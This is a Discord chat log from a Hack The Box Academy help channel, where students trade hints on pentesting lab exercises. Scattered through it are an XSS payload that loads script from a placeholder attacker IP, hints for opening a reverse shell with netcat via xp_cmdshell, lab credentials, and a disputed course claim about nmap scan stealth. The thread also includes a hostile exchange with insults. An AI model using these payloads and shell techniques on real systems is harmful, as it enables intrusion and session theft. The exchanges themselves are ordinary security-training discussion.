Whereas on a Windows system, doing the thing is easier
¯\_(ツ)_/¯
fair enough, I will do it on a Windows box
did you solve it?
What module and section is that?
https://academy.hackthebox.com/module/191/section/2055 HTTP Attacks. Log injection. Bypass <>
I forget what I did, just tried a few things and no luck 😦
Maybe you know where I can read about <> filter bypass? All of the \u and % encodings don't work. That's really confusing
The question is not about bypassing filters @worthy pagoda
So you need to adjust your approach. See the pop-up notification you get when visiting the website and you shall find the way
you mean cookie value true?) ok, got it
Hello, is there someone that I can message to help me better understand why something works on the "AD Skills Assessment 2" please? It has to do with capturing credentials, but I don't want to spoil it.
I'm honestly not quite sure why it works either but I'd be interested in your ideas. I also have a working theory myself but dunno if it's true. feel free to dm me 🙂
Thank you that'd be great! I dmed you.
It's not misleading: the section does not tell you at all to assume that the last line before the exercise has anything to do with the section's question; it's your own whims.
Also, delete the parts of your message that spoil the question. You are giving away the answer as you can guess.
I'm willing to bet that over 90% of people doing the exercise are trying to bypass the WAF when they start because of that line. You continuously argue with me instead of taking people's recommendations on how to improve the labs.
The section is named "LOG INJECTION," and it explains how to carry out LOG INJECTIONS, and then you go to BYPASS WAFs (filters). Something does not add up.
I am not arguing, just responding to your messages.
The labs are sometimes throwing curve balls, so it wouldn't be a stretch to assume that they want you to bypass the WAF by encoding the special characters, especially since that's the last idea that's planted into our mind as we finish reading the section
The misunderstanding arises because of this: "In a real-world setting, filters may be in place that we need to bypass." When I read this, the first thing that comes to mind is WAF. In my case, of course.
Yes you need to bypass the WAF in place but not focus on filters very strongly.
In real-world engagements that's what happens. You have to be creative to be successful when it comes to pentesting. Don't expect uniform patterns.
It's not this module's problem; some modules tell you exactly what you need to do, but others don't say that and sometimes just confuse you, sometimes it's not so obvious) btw this module is really good and more like real life
Wait until you get to response splitting, if you can finish it let me know because I'm still stuck. The rest, including the final assessment is straightforward
oK!
Trying to mount the NFSSHARE from the NFS - Foothold module. I got this error. Anyone have a hint? It works well when I try to mount the "nfs" share, but I have an issue with the second question with "nfsshare"
No pain No gain 😉
change the first nfsshare to nfs?
that's the name of the share, not the share type
ohhh gotcha! Thank you
also try not to post flags
Yes I'll remove
Any languages I should know before starting?
Familiarity with Linux and bash in general will help. Python is a bonus. The rest will come in time. Academy does a pretty good job of slow rolling you into it. Just PLEASE don't start in the middle.
Okie thank you!!
I am still battling this, I thought I had it figured out, but it has me edit the htb/fatty/shared/resources/User.java down towards the end of the section. It says to modify the code and shows what to modify. My question is I see two places in the User.java file that look like is where I should modify it. I am a bit confused if I should delete everything in that file and replace it with the code it shows, or just modify one to both places that have the public User(int uid, String username, String password <snip-->) etc? Hopefully my question makes some sense.. Thanks!
If anyone else has some insight on Exploiting Web Vulnerabilities in Thick-Client Applications in the Attacking Common Application module for the above question I would love some help. Thanks!
Yeah, that was annoying to follow in an example. I believe ||it's the one that has less in it. I think that's the second one||, but I'd need to look at the Java to be sure.
I mean.. you could literally try changing both, and see what happens 🙂
Ok I tried the top one but deleted everything between that and the second one (made it into one statement.) I will try one at a time, Thanks!
In the Linux Fundamentals course, in the File Descriptors and Redirections section, the question asks "How many total packages are installed on the target system?". Could someone please explain what exactly I am meant to be looking for? Is it a specific type of file extension?
At the risk of overexplaining, every "program" you install within Linux consists of one or more packages. This could be application functionality or base-OS functionality. There is a command you can run that lists out the currently installed packages. Remember that there is more than one package manager in the Linux world, so make sure you're using the command for the right one for the target OS. This command may or may not display the number right there; can't remember, but there is another command that you could redirect output to somehow that can count the output.
I finally found out how to answer the question, basically I was using the wrong command (||apt instead of dpkg||) and wasn't using the correct filters but after watching a video I was able to understand what I was being asked to do in the question better... Thank you for attempting to help me but in all honesty it was a video that helped by spoon feeding me the way to do it that helped, which I didn't really want to do
As your post is almost a month old, really hopeful you solved it... but if you haven't, feel free to DM.
I tried both spots now and still get a login failure, I'm sure I am messing up some part of it but have no idea really what at this point...
Are you using their example username?
I can log in as QTC with the default password fine, it is the SQL part that fails, if that is what you mean
Hey
I am stuck at the Attacking Common Services module at the SQL section. Enumerate the "flagDB" database and submit a flag as your answer. I already tried things like ||impersonation (but there is no one to impersonate). I also tried just using the flagDB database but I have no rights. I cracked the password in the task before but I don't know how to use it. I also tried searching for remote databases but also no luck.|| Can someone give me a little push in the right direction?
That should work.
Just ||log into the db with the new creds. Same way you probably did for question 1.||
What you might not be doing is ||copying the modified java file into the new package||. The commands you are given, ||only copy files from the folder with the first files they get you to modify||. So it ends up with the original code.
Only thing else I can think of without looking at the question again is that you are using ||the wrong username. You're meant to be using the service account. You may need to explicitly identify it with .\\ at the beginning.||
Hmm good point, let me try again...!
@pine dagger
always getting the same error with the other account as well. IDK why that happens. Maybe you know
(That's the default account given in the exercise)
That's not the account that you cracked the password for.
yeah I know
But I wanted to post the command I used. I just replaced it with the default account so I don't spoil stuff
The other one gives the same error
Well, I'd have to redo it to confirm, but that's what I have in my notes.
@pine dagger Got it. It wanted ||-windows-auth||. Though sqsh still isn't working. At least I got the task with mssqlclient.py now
Hi @plucky rover ! I'm blocked at the same question. Could you provide me some help?
Is the VPN shit today? I've tried US1 and US2; also Pwnbox is going so slow it's unusable
In the FOOTPRINTING module (DNS), I have an issue with this question. I tried many combinations of "dig" and never found the correct answer. From my understanding the FQDN is [hostname].[domain].[TLD], so I'm looking for an answer of that format, but could not find the answer.
For the AD enum & Attacks assessment pt 1, I’m unable to answer question 2….I was able to get a reverse shell, but for some reason can’t upload any tools and use them….whenever I try to upload them via the feature in the web shell, it doesn’t actually work. Anyone else have this problem?
Yeah you are right with the FQDN, it's something like www.google.com
Can you send me what you tried via DM?
Because if you played around with dig you should have found it by now and I guess you just have some minor mistake
For Password Attacks > Credential Hunting in Linux, does anyone know the intended way without using the hint? I don't see how I was supposed to get it without the pass from the hint.
Unable to find the upload path for file upload skill assessment. Anyone able to help?
Is there a way to press the Windows key to get a PowerShell prompt while in xfreerdp? Using macOS > to the ParrotOS instance > Windows box.
It should work normally. DM me
Hey, is this for the flag question? Feel free to DM me. I'm working on this module rn as well.
Use the provided resources from the resource zip file
Hello guys, I am stuck on Linux Fundamentals, File System: What is the size in GiB of the "/dev/vda" disk in our Pwnbox? (Format: 000)
can anybody help? please?
I believe the command is lsblk
wait let me try
boom
you're a king man
thank you
I was suffering for 2 days lol, I finished all, only this one stuck
Understanding device naming and usage are essential if we want to competently install and use disks in Linux. Device naming has changed and evolved over the numerous versions of Linux that are constantly being put out and as the technology changes. To check the disk size in Linux, you can use lsblk, fdisk, or parted […]
But the correct pass is a mutation of the one given in the hint and it's not in the password.list file
Hi, I am doing the Kerberoasting - from Linux section from the ACTIVE DIRECTORY ENUMERATION & ATTACKS module and I have an issue: the GetUserSPNs.py script is asking for a password
If anybody experiences difficulties with the US VPNs, always try switching to EU. For some reason US rarely works for me.
Can I ask a question regarding the SQLMap Essentials Attack Tuning module?
I found a flag but seems like it doesn't work 😦
There is a custom.rule used to mutate the password.list
Can I get a nudge for the CBBH session hijacking part of the XSS module? I cannot get any payloads to work (I don't see any traffic being made to my local server from the target), and I'm at a loss for what I'm doing wrong
Starting Point 1 is not available at the moment?
Will Starting Point 2 work the same?
@ me pls
if answer
sudo fdisk -l
ah thanks
mb
Hoping you already solved this, but if you're still stuck on it, DM me.
Hi guys, I am stuck on SeTakeOwnershipPrivilege section from WINDOWS PRIVILEGE ESCALATION module.
My issue is that whoami /priv does not include either enabled or disabled SeTakeOwnershipPrivilege with the htb_student rdp account.
Did I miss some steps to access the privileges? The post mentioned SharpGPOAbuse but there seem to be no instructions with it.
Hi, I just started and am excited to learn! However I'm not sure what I am doing on this module. https://academy.hackthebox.com/module/35/section/219
It says to get the flag. I think I did what it asked of me, I used the target IP with /download.php
After that I am not sure where or what I am supposed to be doing to get the flag.
Thanks, I could finish it by that time, what a great module, wasn’t it?
that should be the answer, try to specify the method for the request.
@burnt sluice thanks, I was just a dummy and didn't realize I was looking at the answer 💀
This one wasn't correct, I tried it
Anyway I got my answer, thank you
hey guys quick question
for nmap enumerating, the module mentions that the nmap connect scan is the most stealthy way of determining the state of a port
but in the nmap documentation, nmap says that the most stealthy way isn't -sT (connect) but -sS (TCP-SYN)?
This is the most basic form of TCP scanning. The connect() system call provided by your operating system is used to open a connection to every interesting port on the machine. If the port is listening, connect() will succeed, otherwise the port isn’t reachable. One strong advantage to this technique is that you don’t need any special privileges. Any user on most UNIX boxes is free to use this call.
This sort of scan is easily detectable as target host logs will show a bunch of connection and error messages for the services which accept() the connection just to have it immediately shut down. This is the default scan type for unprivileged users. <- from nmap docs
The Connect scan is useful because it is the most accurate way to determine the state of a port, and it is also the most stealthy. Unlike other types of scans, such as the SYN scan, the Connect scan does not leave any unfinished connections or unsent packets on the target host, which makes it less likely to be detected by intrusion detection systems (IDS) or intrusion prevention systems (IPS). <<-- from HTB
anybody able to provide any clarity on that?
From what I've read, with -sS the TCP packet flow is SYN - SYN/ACK - RST, which means the handshake never completes
however with -sT it performs a proper handshake (SYN - SYN/ACK - ACK) which actually establishes a connection
so surely the server would notice the connect scan as opposed to the TCP-SYN scan?
Footprinting SNMP
Q) Enumerate the custom script that is running on the system and submit its output as the answer.
Any hints?
In order to enumerate SPNs you need domain user credentials. That's what it's asking you for
Dm me what you've tried so far
Done
Elaborate further
sudo openvpn <directory to .ovpn file>
did you solve the challenge? If not, I can give you some hints
Hello everyone?
Are HTB writeups prohibited? For example, if you write a walkthrough without revealing the flags, is that prohibited?
Thanks mate
Hello everyone.
I need help with the Port Forwarding with Windows Netsh part of the Port forwarding and pivoting module.
I can RDP to the pivot but I don't have admin rights to run netsh.exe. Can someone give me a tip on how to do the privilege escalation here?
Hey, I'm in Windows Priv Esc PILLAGING. I got the SAM and SYSTEM files, I used samdump and impacket-secretsdump and got the hashes, but nothing seems to be working for the Admin hash as the correct answer. Can someone give me a heads up on what I might be doing wrong?
There are a few snapshots, you will have to find the one that will work
Hint: Take into consideration the time and the paths
e.g. the latest?
¯\_(ツ)_/¯
fair thanks for the info
give me a sec, because I retrieved them and am dumping them offline
I can't remember and I don't have my notes here at the moment. However, I may sound silly, but did you check your user permissions? When you right click on CMD or PS, does "run as administrator" ask you to insert a passwd?
thanks
yup, it worked. Thanks a bunch!
I need help with the Active directory enumeration & attacks skill assessment II
hey, stuck on this as well, would you be able to give me a nudge?
Can we earn cubes without going through modules?
I believe not, only when you complete a module 100%
I think you can buy them. Check this out:
https://academy.hackthebox.com/billing
Sad, I'm stuck with a bit less than 50 cubes
Didn’t find any way to grow that number 🤦♂️
Every cheapest module is 10 cubes but it only rewards me 10 so I'm not growing 🥲
Or I misunderstood something
Yeah I've seen this, thx
You can buy cubes or when you complete a question (by some, you will earn cubes too)
Any experts of John here or at least know it well enough to mentor?
Depends what you mean by hack and email I guess
like if I send a phishing attack to one of my other emails
Pretty sure that should be fine as long as you control all the email accounts. The problem only arises if you try to bruteforce passwords of an external email provider because you are effectively attacking their infra
Well I am not a bot
oh okay thanks
Still no lawyer so be cautious 😄
haha yes
xD
Can someone help me with the Nessus assessment? The 172.16.16.100 IP doesn't seem to work
Which module is it? @slate shell If it's Vulnerability Assessment you can DM me
It'll be a bit of time before I can help, but send me a DM
Hello guys, how is it going? I'm so stuck on the first brute force Skills Assessment. I easily succeeded with the first flag but for the second I am going mental. Can anyone help?
What did you try? If you think it's too spoiler-heavy, DM me
alright
Hi guys, let me know if someone else is available for a little help, please
Hello, I need help completing the Blind SSRF module in hack the box
If you read you'll see that in order to access other channels you need to verify your HTB account here.
Second: it's rude to just randomly @ or reply to people
gm everyone
Module: Shells & Payloads
Section: The Live Engagement
Question: Connectivity Issues
Description: I'm having issues connecting to the foothold host for the Live Engagement. Attempts to SSH or RDP into the host with the provided credentials result in connection time out errors, connection failed, or connection refused.
I'm using a VM with the VPN key. I've tried redownloading the VPN file. No success with a refreshed key. Same results from the Pwnbox. Any help is muchly appreciated.
Module:Cracking Passwords with Hashcat
Question:Cracking Common Hashes
Hi, I have tried most of the rules but I can't find it, can you give me a hint?
Did you try pinging the box? Do you get a response?
I did not, but I just ran it. Ping is good.
Edit: Correction, sort of?? I tried ping again and got 100% packet loss.
Possible suggestion for the HTB Team --
I am working through the "Attacking Common Services - Easy Lab" -- in the "Resources" there is a user list and a password list. These lists are used throughout the module for attacks that require a bruteforce. In addition, the user list is used in the lab to discover the correct username.
Nevertheless, to find the password, you then have to switch to the "rockyou.txt" wordlist (which I learned after too much experimentation to figure out what I am missing). If the module provides a user/password list --- but there is a part that requires a different list --- please provide this information. The constant experimentation with random wordlists does not help the student learn the bruteforcing process. In the real world, pentesters generally have standard wordlists they use (or wordlists that are discovered through enumeration on the target domain) and bruteforcing is done via high-end "cracking" machines or renting cloud machines.
Randomly experimenting with wordlists, especially when it's unclear at best, leads to frustration -- not learning.
Of course, all in my opinion so take it with a grain of salt 🙂 always a good chance I am missing something the HTB team is trying to accomplish!
Are you using xfreerdp? Make sure there’s no spaces in between “/v:<ip>”, etc
Triple checked syntax, target ip, username, password:
xfreerdp /v:10.129.126.213 /u:htb-student /p:HTB_@cademy_stdnt!
That looks good to me, if you’re getting inconsistent ping responses try resetting the box, maybe turn off your firewall if you have one running (shouldn’t mess with outgoing connections but idk)
Yeah, I reset the target host a couple times, redownloaded the VPN file, tried accessing from the pwnbox...nada.
use 'HTB_@cademy_stdnt!' in quotes
Just tried.
──(kali㉿kali)-[~/Kali_Host]
└─$ xfreerdp /v:10.129.126.213 /u:htb-student /p:'HTB_@cademy_stdnt!'
[10:59:30:523] [74259:74260] [ERROR][com.freerdp.core] - freerdp_tcp_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_FAILED [0x00020006]
[10:59:30:523] [74259:74260] [ERROR][com.freerdp.core] - failed to connect to 10.129.126.213
hmm, can you ping that IP? @small steppe
Yup.
hmmm that's weird. I would reset the machine
I've done that. At least twice.
Which module is this, I can try it myself in 5-10 mins ; )
Are you using tcp or udp vpn key?
udp
try to switch to TCP
cool! I will try myself in a bit.
If you have time I was working on this last night and got very stuck on box 2 in the live assessment 😅
This worked. I swear -- it's always the smallest things...
hahaha lol! I had such times too 😂
Muchly appreciated -- I was throwing myself at the wall over this.
aww sure! I have done all the modules. You can dm me for nudges
Thanks! I’m at work now so I can’t try anything until later. But for reference I was trying to run the metasploit module that’s hinted at on the blog site, kept getting “Exploit failed: NoMethodError undefined method `split’ for nil:NilClass”
hmmm that's a weird error.. well PM me after work 😁
I can help if you're still stuck, DM
Hello! Can anybody give me the payload for the Cross-Site Scripting / session hijacking part? Running out of ideas..
The payload of which stage?
The exercise is based on the material, so if you have understood the material you can use it to your advantage
I used the same payload as other people (who showed it here) but it's not working "><script src=http://OUR_IP></script>
I can assure you it works
unluckily not in my case, where did you enter it?
I used every input field
Take a break, and rethink
getting no response on my PHP server
already did a few times
pls tell me what to do next
All that you need to solve it is within the material of the section
Can you be a bit more precise?
can't be more precise on that mate
Bro your tip is not more than "check your material" :/
Yes, because everything you need to solve it is in it
then what is this academy chat for? Everything is solvable with the knowledge from HTB
it's about getting stuck and helping others out, nvm
Agree, however, you are asking for the payload directly and not a specific question
which makes me think that you don't want to bother much with troubleshooting why it is not working, but rather just want to have a working one from someone else
hey guys, how do I start solving a challenge?
No, it's not that I am too lazy to test things out; I already tried some payloads from HackTricks and the six listed in the section, set up my PHP server and waited for a response, but nothing came back
Check how the web page is filtering your XSS payload.
The ip i entered is also correct, checked that several times
break the things in to multiple pieces, pick one and try if it works and if it does move onto the next one
You can't simply copy + paste stuff.. each websites filters the XSS payload slightly differently. By advise; open inspect element, and verify how your payload is being filtered on the webpage.
ok i guess you want me to check the hijacking/scripts.js
Honestly, no clue where i could find a filter or smth
Check your payload and how the website is processing it
How can i see how the backend is processing it? I cant find any frontend processing except the email-regex and the empty-check
with php the backend code is abstracted away and processed on the sever only. it then returns to you html or files that have been processed.
the whole point of the module youre on is to throw stuff at the inputs methodically.
if your server isnt getting responses, maybe youre trying the wrong input. maybe your server command is incorrect.
"can i get the answer" isnt a good way to learn. explain what you did, explain whats wrong, and ask for a hint. users are are much more apt to respond to someone who shows that they tried.
I set up a php server on port 80, got my ip via ip a and entered the 6 payloads from the module. I am getting no response on my server although i checked the correctness of my entered url and made sure my payload was correct
what was the server command you used?
are you sure that youre targeting your tun0 ip?
maybe the port is filtered, needs to be changed, or needs to be called out to directly.
Checking that later, thx
Did you solve this by any chance?
How you going with the easy lab?
Get any shells to work.. I'm stuckkk
Hey guys, having a tough time with question 7 of the AD Enumeration & Attacks - Skills Assessment Pt 2….I was able to get a mssql session going….but xp_cmdshell doesn’t give much other than a headache lol.
Any nudges?
@wanton mica Are you able to execute xp_cmdshell?
I did! And I finished it. I'll DM you.
Yeah, if you can execute xp_cmdshell -- you have full RCE on the system. Think of how to upload a shell to get a better foothold. Feel free to DM me for help.
Another suggestion to HTB staff (and other students who might be stuck) -- The "Attacking Common Services - Medium" lab is supposed to have 6 services come up (based on the forums). I have restarted the target twice so far, waited 5+ minutes for my scan, and nmap -p- scan is still only returning 4 services. No way I would know that I am missing the main services without reading the forum. It may be helpful to add a note on the number of services that SHOULD be exposed, and that some students have reported issues seeing all the services.
I am on to rebooting the target for the 3rd time to see if I can finally get the services to start.
yeah, it takes a few resets and a couple of minutes of waiting for that port and service to work
Yeah... that's frustrating to say the least 😂 -- It would be helpful to have a note as a "Hint" with that information. I only spent a little time enumerating the services, before checking the forums after realizing something seemed off.
For anyone who reads this in the future, it took me 5 restarts...
Session Security skills assessment. How do we even start that? Like are we supposed to guess the admin email? should it be obvious? is it necessary? I've done every other exercise in the module but don't get how im supposed to approach this one. It seems like every other exercise i had known victim and attacker credentials.
hello, can somebody provide me with a bit of a sanity check pls?
module: ACTIVE DIRECTORY ENUMERATION & ATTACKS
section: AD Enumeration & Attacks - Skills Assessment Part II
Q: I have system priv on ||SQL01|| and know that i need to get the pass for ||mssqlsvc|| but i cant crack the ntlm hash and the password i get from tools seems to still be partially encrypted? i know it has something to do with ||Sup3rS3cur3...|| but im not getting its cleartext version only something similar to this (but with the actual password inside)||;.6.b.u.^.u.r.;.m.J.&.E.S.&.#.I.u.).C.Q.Z.e.c.k.||
How should I figure out what the actual, full pass is?
||You can still authenticate as a user without their cleartext password||
i was so focused on getting the pass that i did not think of this.. thanks 🙂
Module: Shells & Payloads
Section: The Live Engagement
Question: Host 2 - Exploit the blog site and establish a shell session with the target OS. Submit the contents of /customscripts/flag.txt.
So, I have my exploit in MSF and I set the options. Exploit returns an error (see image). I did some searching on the Discord and it looks like I'm doing everything appropriately -- unclear why I'm getting this error. Any ideas?
Edit: Resolved.
Yeah I was able to do that via xp_cmdshell ('xp_cmdshell dir' for example)
Will do….just gave me an idea
well, you are able to execute commands as behalf of the system ; ), Try to execute ||nc64.exe||
Then enumerate from there
OMG WHY DIDN’T I THINK OF THIS…lol thanks!
hahah no worries 😁 get a full-interactive shell. It's windows, I would use: ||rlwrap nc -lnvp <port>||
Hello am generating a reverse_tcp on dll file, am running the dll and i am getting a connection on my machine but no reverse shell. Is something that i need to be careful of?
Nevermind :}
I have finally completed HTTP Attacks module, it was painful and I contemplated my existence many times, but it's done now. If anyone ever stumbles upon this, you can message me for hints, so you don't have to lose your mind like I did
hey guys
i have a problem to solve skill assessment the "File upload" module
any body can help me?
i understand all of step and solve them but have a problem in last step (get the flag)
Hey there ! I have a question :
The exams : " HTB Certified Penetration Testing Specialist " if i buy a ticket, it doesn't give me access to all modules ? they just give me two tickets to take an exam?
(sry idk if its the right channel)
pm me
afaik yes
ok thx
hmmm
Make sure you're using the right callback ip in the LHOST
The ticket is just for exam
has anyone successfully installed BIND9 on their local parrot os VM?
fpr the footprinting module
*for
You don't really need to install bind for it
Why are you installing bind?
wanna follow along
and do the same
to test
there is a dependency conflict however when I try to install it
atm I am doing Footprinting -> Oracle TNS -> I receive the following error. Does someone have a solution for it?
┌──[🛡️ f0rk]
└──╼[🔥]/opt/blackbuntu/odat $ sqlplus scott/tiger@10.129.205.19/XE;
sqlplus: error while loading shared libraries: libsqlplus.so: cannot open shared object file: No such file or directory
┌──[🛡️ f0rk]
└──╼[🔥]/opt/blackbuntu/odat $ sudo sh -c "echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf";sudo ldconfig
Some packages could not be installed. This may mean that you have
requested an impossible situation or if you are using the unstable
distribution that some required packages have not yet been created
or been moved out of Incoming.
The following information may help to resolve the situation:
The following packages have unmet dependencies:
bind9 : Depends: bind9-libs (= 1:9.16.37-1~deb11u1) but 1:9.18.12-1~bpo11+1 is to be installed
E: Unable to correct problems, you have held broken packages.
it's prob a weird edge case sorta thing but like I said. It's not needed and a lot of the 'follow along' isn't too important. ¯_(ツ)_/¯
hi guys, any pointers on the username injection task in broken auth module? just getting passwords don't match? - nevermind. for some reason the server bugged. reset and tried again and it worked, love wasting time !!
If you do the troubleshoot step from the section it should work
I'd also suggest adding the odat to your $PATH
For some reason it doesn't like to add it to path
But I didn't really have any issues with it not working (fully up-to-date parrotOS)
hmm
┌──[🛡️ f0rk]
└──╼[🔥]/opt/blackbuntu/odat $ export LD_LIBRARY_PATH=/usr/bin/sqlplus:$LD_LIBRARY_PATH
┌──[🛡️ f0rk]
└──╼[🔥]/opt/blackbuntu/odat $ sqlplus scott/tiger@10.129.205.19/XE;
sqlplus: error while loading shared libraries: libsqlplus.so: cannot open shared object file: No such file or directory
¯_(ツ)_/¯
got it
I had to add this: export LD_LIBRARY_PATH=/usr/lib/oracle/21/client64/lib:$LD_LIBRARY_PATH
Thanks to chatGPT ❤️
yUP HAHA
I just followed the script they provided
as in copy pasted to a file then chmod +x ¯_(ツ)_/¯
I did that too
Weird then
Only issue I had was the predic
aww okay
I have trouble too
I've got troubles in my File Upload module ^^'
If someone already finished this module ^^'
Can I chat with someone about the answer for the SMB module and what the full path of the share is? Its not accepting my answers and I am not sure why.
Sure dm me
Hint: convert windows to linux
Iirc
I have a question related to AD enum & attacks skills assessment 2…
How the hell is everyone able to use ||PrintSpoofer||? I’ve tried compiling it on both windows and Linux and it just won’t work…and for some reason I can’t install winegcc
Can anyone help me with the DNS section on the Footprinting lesson? I have no idea what to do. I tried using Dig and DNSEnum, but I couldn’t get the answer for any of the questions, I don’t really understand what to do
Did you check the zone transfer?
I tried that by using dig with AXFR, I saw a few text entries but I didn’t know what to do with that
I tried digging the subdomains I got but I couldn’t get anything else either
It is said that we often times have to look…ummm….internally to solve our problems….we have to dig internally…nawmsayn?
Don’t really understand
Yes…what Master Marcie said
As far as the octet of x.x.x.203, subdomains of subdomains
Hi i m new here
Wait which problem are you guys talking about?
I was looking at the second one with txt
DNS footprinting
Yeah but which problem on that section
Doing a zone transfer to one of the subdomains gives you the text record
So I would use dig to get AXFR on one of the subdomains?
Yes
Ah I see I got it
I really don’t understand DNS I have such trouble understanding it 😭
The section kinda goes over it a fair bit
I’m also having trouble with the FQDN… wouldn’t the FQDN of inlanefreight.htb just be
http://inlanefreight.htb
Nope
Oh I guess not because it’s not a web server huh
Are website FQDN’s and DNS FQDN’s two different things?
no
so a FQDN specifies the full domain name for a specific instance, the domain name is just like the root of it
fqdn = hostname + domain name
aka. hackthebox.com would be the domain name. academy.hackthebox.com would be the fqdn for academy
i'm on my last module and i've made it most of the way through. I'm stuck at the user.java part in the fatty client. i've overwritten the two sections the chapter discusses, but I'm still not able to get qtc' or the sql string to bypass auth for me. anybody have any pointers?
Ohh, but if it asks for just one FQDN, how do I know which subdomain to choose?
Read the question carefully
Because I got several such as mail1, ns, app, dev, internal, root
It's asking you the fqdn of a specific thing
Ah, I’ll check again in a bit I have to go to a different class now
hey guys
does anyone know how to run commands like osintgram and aircrack-ng or hydra
because most of the people put these contents on youtube but they don’t explain it with more details
most of the videos on social media also doesn’t tell you exactly how
they just tell you what is used for but they don’t tell you exactly how to do it or they don’t explain much about
man tool
doesnt sound module relevant
There is a module related to aircrack iirc
But yeah their phrasing indicates they're just watching a video
guys i know man or help commands but in some places u have to specify a file or it should be done through root
most of the youtubers don’t tell you that
i've recompiled the fatty.server and gone through all the source code with jd-gui
Ok this is really getting off topic since you can't read
thx guys i think i was just a noob to ask here
its not about being a noob or not, this just isnt the correct place.
but for some reason when I move user.java over to the raw folder and recompile the java app, launch traverse.jar it fails to log me in with qtc'
😮
I've heard this one is a pain I'm not looking forward to it
this is my last mod in the whole cpts deallyo
Lol you got this
It's not on the exam at least
i think u should also read the rules for being disrespectful
:: laughs in offsec ::
The alternative is we start pinging mods about ya being offtopic till you get the boot. You can either take the genuine advice and eventually get the help you're looking for or you can bitch at the people pointing you in the correct direction and go nowhere like the 6521 other unverified users before you.
^
This occurrence plays out daily here.
It gets tiring explaining the same thing every other hour
i’ll just go and cry
Youd pick crying over reading, amazing
😂 as long as u guys get angry
Not angry, just disappointed
about urself?
Idk man these people are pretty active and helpful to peeps. I wouldn't be pissing off the peeps that will likely be the ones you want help from in the future.
This is off topic enough as is. Let's stop it now or we shall just get mods involved
Ugh I need to get back to rewriting my notes
dude i mean this is their job to correct us or direct us and not being disrespectful for people as they get bored relating these advices
What? lol
lmao this isn't my job
Look at their roles
@carmine kiln can you please get @dreamy forge on topic please 🙏
ok then u guys can choose to not answering me
Hey f0x can I pay you in a highfive to redo my modules and write my notes
theres a lot of people here to answer
Oh snap, should I be taking notes?
Yeah probably
no, its that this channel is strictly for module discussion, not any questions. We directed you where to go to unlock the rest of the server channels where there are places you can ask your question
moron
Heck you can even ask your question in #1024429874246590575 unverified
Reading hard
was it so hard to say that from the beginning
LOOOL
Dude it's in the rules that you failed to comprehend
If you cant read maybe pick a different field to learn
i am peaking cyber security to just write commands
lul
yo what is reading i just got here
@sterile hawk since woodenk seems busy can you get our dear friend @dreamy forge on topic please
ok ok don’t f me just stop it i got bored of this
u are write and i am wrong
ok ?
right*
sorry
close this topic
ok so how was the weather today?
@coral sundial can you get @dreamy forge on topic please? I dont want to ping serious rule break.
lets just keep it it polite then 🙂
this channel is about academy modules
its not about something else, this channel is for academy module discussion
its not a general chat
dude i am new here and also for ethical hacking
I dont care
ok so what should i do now
modules, I think
@dreamy forge so what are you wanting to learn?
Maybe it would be helpful to unlock this channel for verified users only
theyre just trolling at this point give em the boot
ethical hacking and cyber security
because i am a junior student in university (department of computer engineering)
So lets move to the #hacker-lounge and ask questions
they cant because they refuse to read rules or welcome to verify their account.
i don’t have access
no shit
yup i need a husband
after that what ?
Read, understand and you will see the other channels
They are trolling at this point
already been told 50 times to read the channel and literally too stupid or too trolling to do so
just boot em already
No
we already know what ones you dont have access
the oracle tns section of footprinting was interesting ¯_(ツ)_/¯
Time out 1 hr
Also, cannot post images without being verified
Hello
Please I have started my introduction to academy
And I have gotten to the interactive section with terminal
And the question is based on the command "name -a" that I executed, what's likely to be the operating system flavor of the instance?
Please how do I analyse this question?
What part of the question gives you trouble
Do you mean uname? https://linux.die.net/man/1/uname
Print certain system information. With no OPTION, same as -s. -a, --all print all information, in the following order, except omit -p and -i if unknown: ...
Hmmm. Still very stuck on this; it wants me to enumerate the FQDN for the target dns but how do I get that?
Whoops
Mean to replay
Reply*
This ^^
@acoustic owl Yes please
How do you query for that record ;)
A ptr record right?
Assume you know what FQDN is. I'm not familiar with all the modules but I assume that you are using some tools for DNS. You should use the full address when you do.
You're looking for a specific type of record
After all a DNS is this type of server
NS record? 🤔